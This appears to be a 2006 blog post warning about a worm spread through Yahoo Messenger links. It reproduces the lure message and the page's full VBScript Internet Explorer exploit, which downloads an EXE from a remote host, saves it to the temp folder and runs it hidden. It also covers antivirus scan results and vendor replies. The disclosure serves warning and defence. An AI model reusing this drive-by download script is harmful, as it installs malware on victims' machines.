Today I received two Yahoo messenger messages with very similar text, some thing like this:
Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan… Ve dau toi biet di ve dau? http://chendang.net—-/nguyen/
I don’t know what does it mean, and take no responsibility if it means something nasty. Also I’ve added some dashes to it. Anyway, the URL in this message points to a web page with only these sentences on it:
Sao cháº³ng cÃ³ gÃ¬ Ä‘á»ƒ xem tháº¿ nÃ y háº£ trá»i !!!!!
Emperor cÅ©ng lÃ m Ä‘Æ°á»£c nhÆ° máº¥y tháº±ng kia thÃ´i ^_^ keke !!!
Táº¥t cáº£ bÃ¢y giá» chá»‰ lÃ con sá»‘ KHÃ”NG
It is a worm which spreads itself using Yahoo! messenger, and infects unpatched IE users upon access to the www.chendnag.net website. You can find more information on its symptoms and removal on F-secure’s page and McAfee’s page.
This is the VB script inside that page, an old IE exploit:
<script language="VBScript"> on error resume next dl = "http://www.chendang.net----/nguyen/love..exe" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="bl4ck.com" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 </script>
The fact that I have received the PM means the worm does work. I will update here if I get more data, and know if it is an old one or is just gone wild. IE users, watch out!
P.S.: My antivirus did not detect the EXE file after downloading it. So: watch out ^ 2
I checked the EXE file with www.virustotal.com and these are the results:
|AntiVir||184.108.40.206||09.18.2006||no virus found|
|Authentium||4.93.8||09.18.2006||no virus found|
|Avast||4.7.844.0||09.15.2006||no virus found|
|AVG||386||09.18.2006||no virus found|
|BitDefender||7.2||09.18.2006||no virus found|
|ClamAV||devel-20060426||09.18.2006||no virus found|
|DrWeb||4.33||09.18.2006||no virus found|
|eTrust-InoculateIT||23.72.127||09.16.2006||no virus found|
|eTrust-Vet||30.3.3084||09.18.2006||no virus found|
|Ewido||4.0||09.18.2006||no virus found|
|Fortinet||220.127.116.11||09.18.2006||no virus found|
|F-Prot||3.16f||09.18.2006||no virus found|
|F-Prot4||18.104.22.168||09.18.2006||no virus found|
|Ikarus||0.2.65.0||09.18.2006||no virus found|
|McAfee||4854||09.18.2006||no virus found|
|Microsoft||1.1560||09.17.2006||no virus found|
|NOD32v2||1.1761||09.18.2006||no virus found|
|Norman||5.90.23||09.18.2006||no virus found|
|Panda||22.214.171.124||09.18.2006||no virus found|
|Sophos||4.09.0||09.18.2006||no virus found|
|Symantec||8.0||09.18.2006||no virus found|
|TheHacker||6.0.1.071||09.17.2006||no virus found|
|UNA||1.83||09.18.2006||no virus found|
|VBA32||3.11.1||09.18.2006||no virus found|
|VirusBuster||4.3.7:9||09.18.2006||no virus found|
Apparently only Kaspersky and CAT-QuickHeal(?) detect it. According to Kaspersky’s viruslist.com, it was first detected on September 17 2006, yesterday.
After posting this blog entry, I submitted the worm sample (that EXE file it uses) to Avast! and F-Secure antivirus companies. Some hours later, F-secure reached me through e-mail and confirmed the fact it was a recently released worm:
The file, love.exe (181 KB), is verified to be malicious. It will be detected as Trojan-Downloader.Win32.Agent.axn on our next database update.
Their weblog has a note about it and another similar one here.
Ahmad, A friend of mine, had independently sent the file to McAfee AVERT. Some time later their automated system responded that the file was not a known virus, so it was “being forwarded to an AVERT Researcher for further analysis”. Some hours later, the promised researcher contacted him. He informed him that it was a new worm:
A.V.E.R.T. Sample Analysis
Issue Number: 2529850
Virus Research Engineer: *********
Also, a EXTRA.DAT file was attached to this email.Removal instruction based on this DAT file and McAfee antivirus software was contained in the email as well.
No news from Avert! has been heard yet 🙂 Their latest update, today, does not detect the file to be infected.
When I tried to upload the file to a test Yahoo! mail message, their Symantec powered antivirus detected it as “W32.Yautoit”. Very good news for Yahoo! users.
And, by the way, this is the scan results of www.virustotal.com after 48 hours:
|Antivirus||Version||Update||Result||AntiVir||126.96.36.199||09.20.2006||no virus found||Authentium||4.93.8||09.20.2006||no virus found|
|Avast||4.7.844.0||09.19.2006||no virus found|
|AVG||386||09.20.2006||no virus found|
|ClamAV||devel-20060426||09.20.2006||no virus found|
|eTrust-InoculateIT||23.73.0||09.20.2006||no virus found|
|Ewido||4.0||09.20.2006||no virus found|
|F-Prot||3.16f||09.20.2006||no virus found|
|F-Prot4||188.8.131.52||09.20.2006||no virus found|
|Ikarus||0.2.65.0||09.20.2006||no virus found|
|Microsoft||1.1560||09.19.2006||no virus found|
|NOD32v2||1.1764||09.20.2006||no virus found|
|Symantec||8.0||09.20.2006||no virus found|
|TheHacker||6.0.1.074||09.20.2006||no virus found|
|VirusBuster||4.3.7:9||09.20.2006||no virus found|
As you may note, F-prot has not included this in their recent update, but McAfee has.
BTW: I’m wondering that what would happen if the worm writer used this IE exploit instead of this old exploit. This new one works even in the fully patched windows machine.